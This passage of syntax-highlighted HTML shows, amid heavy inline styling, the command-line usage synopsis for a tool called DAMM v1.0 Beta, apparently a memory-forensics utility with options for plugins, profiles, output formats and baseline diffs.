rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">-</span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">d</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">DIR</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">]</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">-</span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">p</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">PLUGIN</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[</span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">PLUGIN</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">]</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">]</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">-</span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">f</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">FILE</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">]</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">-</span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">k</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">KDBG</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">]</span></div>
<div class="crayon-line" id="crayon-5661f791a9922714708817-3" style="background: 0px 50% rgb(253, 253, 253); border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">db </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">DB</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">]</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">profile </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">PROFILE</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">]</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">debug</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">]</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">info</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">]</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">tsv</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">]</span></div>
<div class="crayon-line crayon-striped-line" id="crayon-5661f791a9922714708817-4" style="background: rgb(247, 247, 247) !important; border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">grepable</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">]</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">filter </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">FILTER</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">]</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">filtertype </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">FILTERTYPE</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">]</span></div>
<div class="crayon-line" id="crayon-5661f791a9922714708817-5" style="background: 0px 50% rgb(253, 253, 253); border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">diff </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">BASELINE</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">]</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">-</span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">u</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">FIELD</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[</span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">FIELD</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">]</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">]</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">warnings</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">]</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">-</span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">q</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">]</span></div>
<div class="crayon-line crayon-striped-line" id="crayon-5661f791a9922714708817-6" style="background: rgb(247, 247, 247) !important; border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
</div>
<div class="crayon-line" id="crayon-5661f791a9922714708817-7" style="background: 0px 50% rgb(253, 253, 253); border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">DAMM </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">v1</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span><span class="crayon-cn" style="background: transparent; border: 0px; color: rgb(206 , 0 , 0); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Beta</span></div>
<div class="crayon-line crayon-striped-line" id="crayon-5661f791a9922714708817-8" style="background: rgb(247, 247, 247) !important; border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
</div>
